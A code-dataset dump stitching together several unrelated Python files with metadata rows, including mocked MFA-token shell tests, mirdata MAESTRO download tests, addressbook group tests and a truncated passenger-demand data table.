] | 2 | 2020-06-25T06:15:19.000Z | 2021-02-15T18:17:38.000Z | from unittest import TestCase, mock
from unittest.mock import Mock, call
from app.yubico import mfa
def shell(command):
if command == 'success_command':
return True
return False
class TestStart(TestCase):
@mock.patch('app.yubico.mfa.shell')
def test_fetch_mfa_token_from_shell__command_failes(self, m_shell):
m_shell.run = Mock()
m_shell.run.side_effect = shell
self.assertEqual(None, mfa.fetch_mfa_token_from_shell('fail_command'))
expected = [call('fail_command')]
self.assertEqual(expected, m_shell.run.mock_calls)
@mock.patch('app.yubico.mfa.shell')
def test_fetch_mfa_token_from_shell(self, m_shell):
m_shell.run = Mock()
m_shell.run.return_value = '123456'
self.assertEqual('123456', mfa.fetch_mfa_token_from_shell('success_command'))
expected = [call('success_command')]
self.assertEqual(expected, m_shell.run.mock_calls)
@mock.patch('app.yubico.mfa.shell')
def test_fetch_mfa_token_from_shell__command_succeedes_but_None_instead_of_token(self, m_shell):
m_shell.run = Mock()
m_shell.run.return_value = None
self.assertEqual(None, mfa.fetch_mfa_token_from_shell('success_command'))
expected = [call('success_command')]
self.assertEqual(expected, m_shell.run.mock_calls)
@mock.patch('app.yubico.mfa.shell')
def test_fetch_mfa_token_from_shell__command_succeedes_but_no_valid_token(self, m_shell):
m_shell.run = Mock()
m_shell.run.return_value = 'Some Token 123456'
self.assertEqual(None, mfa.fetch_mfa_token_from_shell('success_command'))
expected = [call('success_command')]
self.assertEqual(expected, m_shell.run.mock_calls)
@mock.patch('app.yubico.mfa.shell')
def test_fetch_mfa_token_from_shell__command_succeedes_token_has_spaces(self, m_shell):
m_shell.run = Mock()
m_shell.run.return_value = ' 123456 '
self.assertEqual('123456', mfa.fetch_mfa_token_from_shell('success_command'))
expected = [call('success_command')]
self.assertEqual(expected, m_shell.run.mock_calls)
@mock.patch('app.yubico.mfa.shell')
def test_fetch_mfa_token_from_shell__no_command(self, m_shell):
self.assertEqual(None, mfa.fetch_mfa_token_from_shell(''))
expected = []
self.assertEqual(expected, m_shell.run.mock_calls)
| 34.028169 | 100 | 0.709437 | 333 | 2,416 | 4.771772 | 0.135135 | 0.083071 | 0.090623 | 0.128383 | 0.823159 | 0.823159 | 0.823159 | 0.823159 | 0.797357 | 0.797357 | 0 | 0.015152 | 0.180464 | 2,416 | 70 | 101 | 34.514286 | 0.787374 | 0 | 0 | 0.5625 | 0 | 0 | 0.133278 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.145833 | false | 0 | 0.0625 | 0 | 0.270833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be1a4328b9b3c3043b56fdbf6aaaecdb54a7f99a | 9,139 | py | Python | tests/datasets/test_maestro.py | lucaspbastos/mirdata | e591c5411c41591e8606812df869dca1ad52ee0f | [
"BSD-3-Clause"
] | 224 | 2019-05-08T14:46:05.000Z | 2022-03-31T12:14:39.000Z | tests/datasets/test_maestro.py | oriolcolomefont/mirdata | e591c5411c41591e8606812df869dca1ad52ee0f | [
"BSD-3-Clause"
] | 492 | 2019-04-08T16:59:33.000Z | 2022-01-19T13:50:56.000Z | tests/datasets/test_maestro.py | oriolcolomefont/mirdata | e591c5411c41591e8606812df869dca1ad52ee0f | [
"BSD-3-Clause"
] | 46 | 2019-04-11T15:12:18.000Z | 2022-01-19T17:33:50.000Z | import os
import shutil
import pretty_midi
import numpy as np
from mirdata.datasets import maestro
from mirdata import annotations, download_utils
from tests.test_utils import run_track_tests
def test_track():
default_trackid = "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1"
data_home = "tests/resources/mir_datasets/maestro"
dataset = maestro.Dataset(data_home)
track = dataset.track(default_trackid)
expected_attributes = {
"track_id": "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1",
"midi_path": os.path.join(
data_home,
"2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.midi",
),
"audio_path": os.path.join(
data_home, "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.wav"
),
"canonical_composer": "Alban Berg",
"canonical_title": "Sonata Op. 1",
"year": 2018,
"duration": 698.661160312,
"split": "train",
}
expected_property_types = {
"notes": annotations.NoteData,
"midi": pretty_midi.PrettyMIDI,
"audio": tuple,
}
assert track._track_paths == {
"audio": [
"2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.wav",
"1694d8431f01eeb2a18444196550b99d",
],
"midi": [
"2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.midi",
"4901b1578ee4fe8c1696e02f60924949",
],
}
run_track_tests(track, expected_attributes, expected_property_types)
# test audio loading functions
audio, sr = track.audio
assert sr == 48000
assert audio.shape == (48000 * 2,)
def test_load_metadata():
data_home = "tests/resources/mir_datasets/maestro"
dataset = maestro.Dataset(data_home)
metadata = dataset._metadata
default_trackid = "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1"
assert metadata[default_trackid] == {
"canonical_composer": "Alban Berg",
"canonical_title": "Sonata Op. 1",
"split": "train",
"year": 2018,
"midi_filename": "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.midi",
"audio_filename": "2018/MIDI-Unprocessed_Chamber3_MID--AUDIO_10_R3_2018_wav--1.wav",
"duration": 698.661160312,
}
def test_download_partial(httpserver):
data_home = "tests/resources/mir_datasets/maestro_download"
if os.path.exists(data_home):
shutil.rmtree(data_home)
httpserver.serve_content(
open("tests/resources/download/maestro-v2.0.0.json", "r").read()
)
remotes = {
"all": download_utils.RemoteFileMetadata(
filename="1-maestro-v2.0.0.json",
url=httpserver.url,
checksum=("d41d8cd98f00b204e9800998ecf8427e"),
unpack_directories=["maestro-v2.0.0"],
),
"midi": download_utils.RemoteFileMetadata(
filename="2-maestro-v2.0.0.json",
url=httpserver.url,
checksum=("d41d8cd98f00b204e9800998ecf8427e"),
unpack_directories=["maestro-v2.0.0"],
),
"metadata": download_utils.RemoteFileMetadata(
filename="3-maestro-v2.0.0.json",
url=httpserver.url,
checksum=("d41d8cd98f00b204e9800998ecf8427e"),
),
}
dataset = maestro.Dataset(data_home)
dataset.remotes = remotes
dataset.download(None, False, False)
assert os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
assert not os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
assert not os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))
if os.path.exists(data_home):
shutil.rmtree(data_home)
dataset.download(["all", "midi"], False, False)
assert os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
assert not os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
assert not os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))
if os.path.exists(data_home):
shutil.rmtree(data_home)
dataset.download(["metadata", "midi"], False, False)
assert not os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
assert os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
assert not os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))
if os.path.exists(data_home):
shutil.rmtree(data_home)
dataset.download(["metadata"], False, False)
assert not os.path.exists(os.path.join(data_home, "1-maestro-v2.0.0.json"))
assert not os.path.exists(os.path.join(data_home, "2-maestro-v2.0.0.json"))
assert os.path.exists(os.path.join(data_home, "3-maestro-v2.0.0.json"))
def test_download(httpserver):
data_home = "tests/resources/mir_datasets/maestro_download"
if os.path.exists(data_home):
shutil.rmtree(data_home)
# download the full dataset
httpserver.serve_content(
open("tests/resources/download/maestro-v2.0.0.zip", "rb").read()
)
remotes = {
"all": download_utils.RemoteFileMetadata(
filename="maestro-v2.0.0.zip",
url=httpserver.url,
checksum=("625180ffa41cd9f2ab7252dd954b9e8a"),
unpack_directories=["maestro-v2.0.0"],
)
}
dataset = maestro.Dataset(data_home)
dataset.remotes = remotes
dataset.download(None, False, False)
assert os.path.exists(data_home)
assert not os.path.exists(os.path.join(data_home, "maestro-v2.0.0"))
assert os.path.exists(os.path.join(data_home, "maestro-v2.0.0.json"))
assert os.path.exists(
os.path.join(
data_home,
"2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.wav",
)
)
assert os.path.exists(
os.path.join(
data_home,
"2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.midi",
)
)
# test downloading again
dataset.download(None, False, False)
if os.path.exists(data_home):
shutil.rmtree(data_home)
# test downloading twice with cleanup
dataset.download(None, False, True)
dataset.download(None, False, False)
if os.path.exists(data_home):
shutil.rmtree(data_home)
# test downloading twice with force overwrite
dataset.download(None, False, False)
dataset.download(None, True, False)
if os.path.exists(data_home):
shutil.rmtree(data_home)
# test downloading twice with force overwrite and cleanup
dataset.download(None, False, True)
dataset.download(None, True, False)
if os.path.exists(data_home):
shutil.rmtree(data_home)
# download the midi-only zip
httpserver.serve_content(
open("tests/resources/download/maestro-v2.0.0-midi.zip", "rb").read()
)
remotes = {
"midi": download_utils.RemoteFileMetadata(
filename="maestro-v2.0.0-midi.zip",
url=httpserver.url,
checksum=("c82283fff347ed2bd833693c09a9f01d"),
unpack_directories=["maestro-v2.0.0"],
)
}
dataset.remotes = remotes
dataset.download(["midi"], False, False)
assert os.path.exists(data_home)
assert not os.path.exists(os.path.join(data_home, "maestro-v2.0.0"))
assert os.path.exists(os.path.join(data_home, "maestro-v2.0.0.json"))
assert not os.path.exists(
os.path.join(
data_home,
"2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.wav",
)
)
assert os.path.exists(
os.path.join(
data_home,
"2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.midi",
)
)
# test downloading again
dataset.download(["midi"], False, False)
if os.path.exists(data_home):
shutil.rmtree(data_home)
# download only the metadata
httpserver.serve_content(
open("tests/resources/download/maestro-v2.0.0.json", "rb").read()
)
remotes = {
"metadata": download_utils.RemoteFileMetadata(
filename="maestro-v2.0.0.json",
url=httpserver.url,
checksum=("d41d8cd98f00b204e9800998ecf8427e"),
)
}
dataset.remotes = remotes
dataset.download(["metadata"], False, False)
assert os.path.exists(data_home)
assert not os.path.exists(os.path.join(data_home, "maestro-v2.0.0"))
assert os.path.exists(os.path.join(data_home, "maestro-v2.0.0.json"))
assert not os.path.exists(
os.path.join(
data_home,
"2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.wav",
)
)
assert not os.path.exists(
os.path.join(
data_home,
"2004/MIDI-Unprocessed_XP_22_R2_2004_01_ORIG_MID--AUDIO_22_R2_2004_04_Track04_wav.midi",
)
)
# test downloading again
dataset.download(["metadata"], False, False)
if os.path.exists(data_home):
shutil.rmtree(data_home)
| 33.47619 | 100 | 0.652588 | 1,195 | 9,139 | 4.7841 | 0.102092 | 0.067168 | 0.079762 | 0.061571 | 0.849047 | 0.807067 | 0.80007 | 0.775931 | 0.751618 | 0.722232 | 0 | 0.082272 | 0.217967 | 9,139 | 272 | 101 | 33.599265 | 0.717644 | 0.034249 | 0 | 0.643836 | 0 | 0 | 0.284855 | 0.226886 | 0 | 0 | 0 | 0 | 0.141553 | 1 | 0.018265 | false | 0 | 0.031963 | 0 | 0.050228 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be2b1e5d5871243b697588703ad7c36a283d69aa | 374 | py | Python | terrascript/data/ciscoasa.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/data/ciscoasa.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/data/ciscoasa.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/data/ciscoasa.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:14:03 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.ciscoasa
#
# instead of
#
# >>> import terrascript.data.hashicorp.ciscoasa
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.hashicorp.ciscoasa import *
| 24.933333 | 73 | 0.740642 | 49 | 374 | 5.653061 | 0.714286 | 0.216607 | 0.166065 | 0.231047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037152 | 0.136364 | 374 | 14 | 74 | 26.714286 | 0.820433 | 0.796791 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
076fbbd503490ed640d8c2a6518eb9b2f8727bd9 | 3,200 | py | Python | test/test_add_contact_to_group.py | kochetov-a/python_training | 20cb104dea8b743c576b8c02a4dedc13679ff384 | [
"Apache-2.0"
] | null | null | null | test/test_add_contact_to_group.py | kochetov-a/python_training | 20cb104dea8b743c576b8c02a4dedc13679ff384 | [
"Apache-2.0"
] | null | null | null | test/test_add_contact_to_group.py | kochetov-a/python_training | 20cb104dea8b743c576b8c02a4dedc13679ff384 | [
"Apache-2.0"
] | null | null | null | from model.group import Group
from model.contact import Contact
from fixture.orm import ORMFixture
import random
orm = ORMFixture(host="127.0.0.1", name="addressbook", user="root", password="")
# Тест проверки добавления контакта в группу (контакт не входит в эту группу)
def test_add_contact_to_group(app, db):
if len(db.get_group_list()) == 0: # Если в базе данных нет групп, то создаём новую группу
app.group.create(Group(name="TestNameForGroup", header="TestHeaderForGroup", footer="TestFooterForGroup"))
if len(db.get_contact_list()) == 0: # Если в базе данных нет контактов, то создаём новый контакт
app.contact.create(Contact(first_name="first_name_test", last_name="last_name_test"))
group = random.choice(db.get_group_list()) # Выбираем случайную группу из списка групп
if len(orm.get_contacts_not_in_group(Group(id=group.id))) == 0: # Если нет контактов которые не входят в эту группу
app.contact.create(Contact(first_name="first_name_test_88", last_name="last_name_test_89")) # Создаём новый
# Выбираем контакт который НЕ ВХОДИТ в выбранную группу
contact = random.choice(orm.get_contacts_not_in_group(Group(id=group.id)))
old_groups = orm.get_contacts_in_group(Group(id=group.id)) # Получаем состав группы ДО добавления
app.contact.add_to_group(contact.id, group.id) # Добавляем случайный контакт в случайную группу
new_groups = orm.get_contacts_in_group(Group(id=group.id)) # Получаем состав группы ПОСЛЕ добавления
old_groups.append(contact) # То добавляем его, если есть – то НЕ добавляем
# Сравниваем содержание выбранной группы ДО и ПОСЛЕ добавления
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
# Тест проверки добавления контакта в группу (контакт входит в эту группу)
def test_add_contact_to_group_again(app, db):
if len(db.get_group_list()) == 0: # Если в базе данных нет групп, то создаём новую группу
app.group.create(Group(name="TestNameForGroup", header="TestHeaderForGroup", footer="TestFooterForGroup"))
if len(db.get_contact_list()) == 0: # Если в базе данных нет контактов, то создаём новый контакт
app.contact.create(Contact(first_name="first_name_test", last_name="last_name_test"))
group = random.choice(db.get_group_list()) # Выбираем случайную группу из списка групп
if len(orm.get_contacts_in_group(Group(id=group.id))) == 0: # Если в этой группе нет контактов
contact = random.choice(db.get_contact_list()) # Выбираем случайный из списка
app.contact.add_to_group(contact.id, group.id) # Добавляем его в эту группу
contact = random.choice(orm.get_contacts_in_group(Group(id=group.id))) # Выбираем случайный контакт из группы
old_groups = orm.get_contacts_in_group(Group(id=group.id)) # Получаем состав группы ДО добавления
app.contact.add_to_group(contact.id, group.id) # Добавляем контакт в группу
new_groups = orm.get_contacts_in_group(Group(id=group.id)) # Получаем состав группы ПОСЛЕ добавления
# Сравниваем содержание выбранной группы ДО и ПОСЛЕ добавления
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max) | 76.190476 | 120 | 0.754063 | 487 | 3,200 | 4.767967 | 0.199179 | 0.069337 | 0.042636 | 0.048234 | 0.800172 | 0.791559 | 0.791559 | 0.732127 | 0.727821 | 0.684324 | 0 | 0.005859 | 0.146563 | 3,200 | 42 | 121 | 76.190476 | 0.844013 | 0.343125 | 0 | 0.575758 | 0 | 0 | 0.106352 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 1 | 0.060606 | false | 0.030303 | 0.121212 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
077ad08b49748b797dafec85867a47fd2e4c38c3 | 37 | py | Python | curator/validators/__init__.py | rprabhat/curator | b0c7ad652a0141799cc499c43c4b9fa56328b4ff | [
"Apache-2.0"
] | 1 | 2017-08-19T08:11:15.000Z | 2017-08-19T08:11:15.000Z | curator/validators/__init__.py | rprabhat/curator | b0c7ad652a0141799cc499c43c4b9fa56328b4ff | [
"Apache-2.0"
] | null | null | null | curator/validators/__init__.py | rprabhat/curator | b0c7ad652a0141799cc499c43c4b9fa56328b4ff | [
"Apache-2.0"
] | null | null | null | from .schemacheck import SchemaCheck
| 18.5 | 36 | 0.864865 | 4 | 37 | 8 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.969697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
078529d3e40ec2b5339f504ef4ae4cacb48301e1 | 260,852 | py | Python | instances/passenger_demand/pas-20210422-1717-int14000000000000001e/19.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210422-1717-int14000000000000001e/19.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | instances/passenger_demand/pas-20210422-1717-int14000000000000001e/19.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null |
"""
PASSENGERS
"""
numPassengers = 27098
passenger_arriving = (
(5, 5, 3, 0, 3, 4, 0, 2, 6, 1, 1, 1, 0, 4, 13, 6, 6, 10, 5, 4, 1, 1, 2, 0, 1, 0), # 0
(10, 10, 14, 5, 5, 3, 2, 4, 7, 2, 1, 1, 0, 9, 6, 5, 6, 7, 6, 1, 2, 2, 1, 0, 0, 0), # 1
(7, 7, 5, 10, 8, 3, 5, 0, 3, 0, 0, 1, 0, 7, 9, 6, 6, 7, 0, 3, 2, 2, 2, 0, 0, 0), # 2
(7, 5, 7, 7, 2, 8, 2, 1, 2, 1, 0, 1, 0, 9, 10, 6, 8, 6, 3, 2, 1, 1, 5, 0, 2, 0), # 3
(13, 4, 5, 13, 6, 6, 3, 5, 3, 2, 1, 1, 0, 10, 7, 7, 5, 8, 3, 2, 3, 6, 1, 0, 2, 0), # 4
(5, 6, 3, 10, 4, 3, 3, 2, 5, 4, 2, 1, 0, 9, 9, 9, 5, 9, 11, 4, 4, 3, 5, 0, 3, 0), # 5
(7, 12, 9, 10, 11, 2, 3, 6, 7, 0, 3, 0, 0, 12, 8, 10, 6, 7, 5, 5, 3, 5, 5, 1, 1, 0), # 6
(12, 10, 8, 10, 3, 6, 6, 3, 5, 1, 1, 2, 0, 13, 6, 7, 6, 12, 1, 2, 2, 6, 4, 2, 0, 0), # 7
(13, 9, 9, 12, 4, 2, 3, 0, 4, 0, 2, 1, 0, 9, 10, 12, 2, 13, 4, 4, 1, 3, 3, 1, 3, 0), # 8
(9, 11, 7, 10, 4, 3, 6, 6, 6, 3, 1, 0, 0, 11, 5, 11, 10, 8, 6, 6, 8, 7, 3, 1, 0, 0), # 9
(14, 8, 13, 9, 6, 4, 2, 6, 7, 1, 2, 1, 0, 14, 7, 6, 12, 6, 6, 2, 4, 4, 2, 1, 0, 0), # 10
(9, 7, 6, 11, 12, 2, 7, 2, 1, 1, 1, 1, 0, 9, 12, 8, 7, 10, 7, 6, 4, 9, 0, 0, 2, 0), # 11
(14, 10, 13, 14, 13, 6, 5, 9, 7, 0, 3, 1, 0, 12, 3, 7, 7, 17, 9, 2, 0, 3, 4, 2, 0, 0), # 12
(7, 12, 7, 8, 9, 4, 4, 5, 4, 3, 1, 2, 0, 10, 11, 8, 7, 12, 8, 6, 7, 3, 5, 1, 1, 0), # 13
(16, 11, 10, 12, 10, 6, 6, 2, 8, 1, 1, 1, 0, 19, 12, 8, 8, 8, 7, 6, 4, 4, 8, 2, 1, 0), # 14
(18, 17, 10, 11, 10, 4, 10, 3, 4, 3, 3, 1, 0, 9, 13, 10, 10, 6, 5, 7, 7, 1, 4, 4, 2, 0), # 15
(18, 15, 18, 14, 3, 4, 4, 8, 2, 4, 0, 1, 0, 16, 8, 11, 7, 9, 7, 10, 2, 4, 3, 5, 1, 0), # 16
(8, 14, 14, 11, 10, 2, 6, 3, 4, 0, 2, 1, 0, 10, 13, 12, 11, 13, 7, 8, 5, 5, 6, 2, 0, 0), # 17
(18, 11, 12, 13, 14, 4, 5, 4, 4, 1, 2, 0, 0, 12, 17, 11, 8, 9, 3, 6, 6, 3, 4, 2, 1, 0), # 18
(8, 13, 13, 9, 11, 6, 3, 9, 6, 2, 0, 2, 0, 15, 13, 4, 7, 8, 7, 2, 4, 3, 5, 3, 0, 0), # 19
(14, 23, 11, 12, 11, 2, 3, 3, 6, 7, 2, 2, 0, 10, 16, 16, 7, 14, 10, 5, 4, 4, 3, 2, 3, 0), # 20
(12, 16, 14, 12, 18, 6, 3, 6, 7, 4, 2, 0, 0, 12, 12, 4, 13, 8, 6, 7, 2, 5, 3, 0, 2, 0), # 21
(17, 13, 7, 12, 9, 5, 5, 0, 3, 3, 2, 1, 0, 17, 12, 13, 8, 13, 8, 8, 5, 5, 4, 3, 2, 0), # 22
(19, 14, 15, 14, 13, 5, 4, 8, 6, 1, 1, 5, 0, 17, 15, 8, 13, 11, 5, 8, 3, 6, 6, 1, 2, 0), # 23
(7, 15, 11, 15, 13, 1, 9, 7, 4, 5, 5, 1, 0, 17, 12, 11, 9, 11, 7, 3, 3, 6, 4, 0, 3, 0), # 24
(17, 13, 12, 14, 14, 5, 6, 4, 5, 3, 1, 1, 0, 21, 12, 11, 8, 6, 7, 7, 5, 5, 5, 5, 0, 0), # 25
(12, 19, 12, 18, 11, 3, 5, 9, 3, 2, 3, 1, 0, 21, 16, 13, 2, 11, 6, 8, 3, 3, 5, 3, 1, 0), # 26
(12, 12, 12, 12, 9, 6, 5, 8, 6, 2, 5, 0, 0, 21, 20, 12, 4, 12, 10, 7, 5, 5, 7, 3, 1, 0), # 27
(18, 13, 12, 11, 10, 10, 3, 6, 7, 2, 1, 3, 0, 19, 14, 16, 6, 15, 6, 6, 5, 5, 1, 5, 1, 0), # 28
(16, 12, 16, 16, 10, 1, 4, 2, 12, 3, 1, 1, 0, 12, 15, 11, 9, 13, 8, 6, 2, 6, 4, 2, 2, 0), # 29
(15, 17, 14, 12, 14, 7, 8, 9, 7, 2, 3, 0, 0, 14, 15, 13, 7, 12, 3, 0, 2, 3, 3, 2, 0, 0), # 30
(12, 10, 9, 4, 7, 3, 8, 6, 6, 4, 0, 1, 0, 13, 15, 7, 13, 13, 7, 5, 6, 6, 2, 3, 0, 0), # 31
(15, 10, 12, 14, 13, 8, 7, 6, 8, 5, 2, 0, 0, 16, 12, 12, 11, 11, 9, 5, 4, 5, 1, 1, 3, 0), # 32
(16, 12, 14, 12, 10, 6, 5, 7, 3, 1, 4, 1, 0, 13, 13, 9, 7, 15, 6, 7, 4, 4, 4, 1, 1, 0), # 33
(13, 19, 12, 12, 14, 3, 7, 5, 4, 1, 1, 0, 0, 16, 12, 13, 6, 6, 5, 8, 2, 2, 4, 4, 2, 0), # 34
(19, 11, 12, 9, 9, 4, 2, 4, 5, 1, 3, 2, 0, 8, 19, 7, 9, 14, 7, 6, 1, 8, 2, 3, 1, 0), # 35
(10, 14, 13, 14, 6, 6, 7, 6, 6, 2, 1, 1, 0, 10, 12, 6, 12, 10, 6, 3, 1, 2, 2, 2, 0, 0), # 36
(14, 18, 7, 15, 9, 5, 6, 6, 6, 2, 1, 2, 0, 10, 10, 9, 12, 8, 8, 4, 2, 7, 8, 3, 1, 0), # 37
(18, 14, 13, 23, 8, 3, 1, 6, 9, 1, 3, 2, 0, 13, 15, 16, 8, 15, 7, 6, 7, 9, 6, 5, 1, 0), # 38
(13, 20, 12, 16, 14, 6, 6, 2, 5, 3, 1, 0, 0, 11, 15, 10, 5, 10, 7, 3, 4, 2, 3, 1, 0, 0), # 39
(15, 11, 19, 18, 9, 8, 6, 5, 5, 5, 1, 2, 0, 10, 12, 8, 5, 7, 5, 7, 6, 11, 5, 2, 3, 0), # 40
(19, 10, 11, 15, 11, 8, 7, 4, 4, 5, 1, 2, 0, 11, 4, 6, 8, 13, 5, 5, 4, 7, 5, 4, 3, 0), # 41
(12, 15, 11, 16, 7, 8, 5, 4, 6, 3, 1, 2, 0, 17, 7, 9, 15, 13, 8, 9, 3, 7, 3, 0, 1, 0), # 42
(16, 7, 13, 14, 11, 5, 10, 5, 6, 0, 3, 2, 0, 15, 18, 5, 12, 13, 11, 10, 2, 10, 3, 3, 2, 0), # 43
(10, 9, 12, 7, 9, 9, 9, 7, 6, 4, 1, 1, 0, 11, 23, 12, 7, 12, 7, 6, 3, 10, 7, 2, 1, 0), # 44
(17, 16, 26, 7, 10, 2, 4, 5, 2, 1, 2, 1, 0, 13, 9, 6, 8, 10, 5, 4, 3, 4, 3, 2, 1, 0), # 45
(12, 14, 20, 12, 11, 5, 2, 6, 9, 5, 2, 0, 0, 17, 16, 13, 7, 17, 9, 2, 3, 5, 4, 0, 4, 0), # 46
(16, 20, 11, 16, 8, 7, 2, 8, 6, 3, 0, 1, 0, 14, 13, 12, 7, 12, 6, 6, 3, 1, 6, 4, 1, 0), # 47
(10, 13, 12, 18, 12, 7, 9, 6, 4, 3, 2, 1, 0, 24, 10, 6, 10, 10, 7, 3, 9, 5, 4, 1, 5, 0), # 48
(13, 10, 10, 13, 13, 7, 8, 5, 7, 2, 2, 0, 0, 17, 6, 9, 8, 11, 7, 9, 4, 8, 5, 2, 1, 0), # 49
(21, 9, 9, 14, 17, 3, 3, 4, 2, 2, 1, 2, 0, 19, 15, 12, 8, 9, 7, 3, 4, 5, 5, 1, 2, 0), # 50
(14, 14, 10, 17, 11, 5, 3, 8, 2, 4, 1, 0, 0, 10, 17, 13, 6, 11, 7, 6, 0, 5, 2, 1, 2, 0), # 51
(19, 16, 14, 9, 6, 7, 6, 2, 11, 2, 1, 1, 0, 9, 18, 14, 11, 5, 8, 5, 5, 8, 5, 0, 1, 0), # 52
(15, 15, 10, 13, 14, 3, 3, 4, 4, 1, 2, 0, 0, 12, 27, 12, 9, 12, 2, 2, 3, 4, 6, 5, 0, 0), # 53
(20, 14, 11, 7, 8, 5, 5, 3, 4, 5, 0, 1, 0, 8, 11, 8, 8, 9, 8, 4, 4, 3, 1, 1, 0, 0), # 54
(15, 12, 11, 9, 11, 6, 4, 8, 4, 3, 0, 0, 0, 18, 7, 11, 8, 13, 3, 5, 8, 6, 7, 2, 0, 0), # 55
(12, 16, 9, 9, 9, 5, 7, 4, 5, 1, 4, 2, 0, 17, 11, 11, 5, 12, 6, 2, 1, 7, 4, 2, 2, 0), # 56
(13, 16, 12, 7, 9, 9, 5, 1, 5, 4, 1, 1, 0, 14, 18, 11, 8, 12, 5, 8, 4, 2, 5, 4, 3, 0), # 57
(16, 16, 8, 19, 8, 1, 9, 2, 3, 4, 1, 4, 0, 10, 12, 6, 4, 19, 9, 9, 8, 4, 3, 2, 1, 0), # 58
